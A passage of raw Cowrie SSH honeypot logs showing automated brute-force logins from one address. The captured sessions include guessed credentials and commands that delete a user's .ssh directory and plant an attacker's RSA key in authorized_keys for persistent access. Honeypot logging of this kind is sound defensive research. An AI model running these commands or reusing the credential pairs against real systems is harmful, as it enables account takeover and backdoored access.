chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:48.367558Z","src_ip":"212.227.235.229","session":"4768a0e817d2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:49.654181Z","src_ip":"212.227.235.229","session":"cf63063aecc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:49.654839Z","src_ip":"212.227.235.229","session":"cf63063aecc4"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:51:50.347786Z","src_ip":"212.227.235.229","session":"4768a0e817d2"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:51:50.909494Z","src_ip":"212.227.235.229","session":"cf63063aecc4"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:52.047601Z","src_ip":"212.227.235.229","session":"4768a0e817d2"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:52.226225Z","src_ip":"212.227.235.229","session":"cf63063aecc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38828,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b516981c44","protocol":"ssh","message":"New connection: 212.227.235.229:38828 (1.2.3.4:22) [session: c6b516981c44]","sensor":"my-vps","timestamp":"2025-09-09T01:51:53.337677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:53.338603Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:53.621168Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:51:55.413791Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:51:55.997409Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:51:55.998293Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:51:55.999853Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:56.283321Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:51:57.474335Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:51:57.475144Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39582,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8182a674e91","protocol":"ssh","message":"New connection: 212.227.235.229:39582 (1.2.3.4:22) [session: e8182a674e91]","sensor":"my-vps","timestamp":"2025-09-09T01:51:58.039939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:51:58.040572Z","src_ip":"212.227.235.229","session":"e8182a674e91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:51:58.630143Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:51:58.631029Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:51:59.284925Z","src_ip":"212.227.235.229","session":"e8182a674e91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:52:00.128055Z","src_ip":"212.227.235.229","session":"e8182a674e91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39404,"dst_ip":"1.2.3.4","dst_port":22,"session":"8509a8a7f853","protocol":"ssh","message":"New connection: 212.227.235.229:39404 (1.2.3.4:22) [session: 8509a8a7f853]","sensor":"my-vps","timestamp":"2025-09-09T01:52:00.341349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:00.342799Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40209,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc54afc0a644","protocol":"ssh","message":"New connection: 212.227.235.229:40209 (1.2.3.4:22) [session: fc54afc0a644]","sensor":"my-vps","timestamp":"2025-09-09T01:52:01.691622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:01.692684Z","src_ip":"212.227.235.229","session":"fc54afc0a644"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:01.719896Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:01.757173Z","src_ip":"212.227.235.229","session":"e8182a674e91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:01.972853Z","src_ip":"212.227.235.229","session":"fc54afc0a644"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:52:03.320655Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:52:03.757833Z","src_ip":"212.227.235.229","session":"fc54afc0a644"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:52:03.905708Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:52:03.906473Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:52:03.907405Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:04.039059Z","src_ip":"212.227.235.229","session":"c6b516981c44"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:04.040165Z","src_ip":"212.227.235.229","session":"fc54afc0a644"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:04.193185Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:52:05.407205Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:52:05.408008Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:52:05.691485Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:05.692503Z","src_ip":"212.227.235.229","session":"8509a8a7f853"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59564,"dst_ip":"1.2.3.4","dst_port":22,"session":"3758585c5564","protocol":"ssh","message":"New connection: 212.227.235.229:59564 (1.2.3.4:22) [session: 3758585c5564]","sensor":"my-vps","timestamp":"2025-09-09T01:52:08.301645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:08.302484Z","src_ip":"212.227.235.229","session":"3758585c5564"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:08.600090Z","src_ip":"212.227.235.229","session":"3758585c5564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39412,"dst_ip":"1.2.3.4","dst_port":22,"session":"26894631262a","protocol":"ssh","message":"New connection: 212.227.235.229:39412 (1.2.3.4:22) [session: 26894631262a]","sensor":"my-vps","timestamp":"2025-09-09T01:52:09.084506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:09.086794Z","src_ip":"212.227.235.229","session":"26894631262a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:52:09.368039Z","src_ip":"212.227.235.229","session":"26894631262a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:52:10.502696Z","src_ip":"212.227.235.229","session":"26894631262a"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:52:10.662124Z","src_ip":"212.227.235.229","session":"3758585c5564"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:11.789999Z","src_ip":"212.227.235.229","session":"26894631262a"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:52:11.961056Z","src_ip":"212.227.235.229","session":"3758585c5564"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52888,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0000f9052d","protocol":"ssh","message":"New connection: 212.227.235.229:52888 (1.2.3.4:22) [session: cc0000f9052d]","sensor":"my-vps","timestamp":"2025-09-09T01:52:12.063417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:52:12.065952Z","src_ip":"212.227.235.229","session":"cc0000f9052d"}
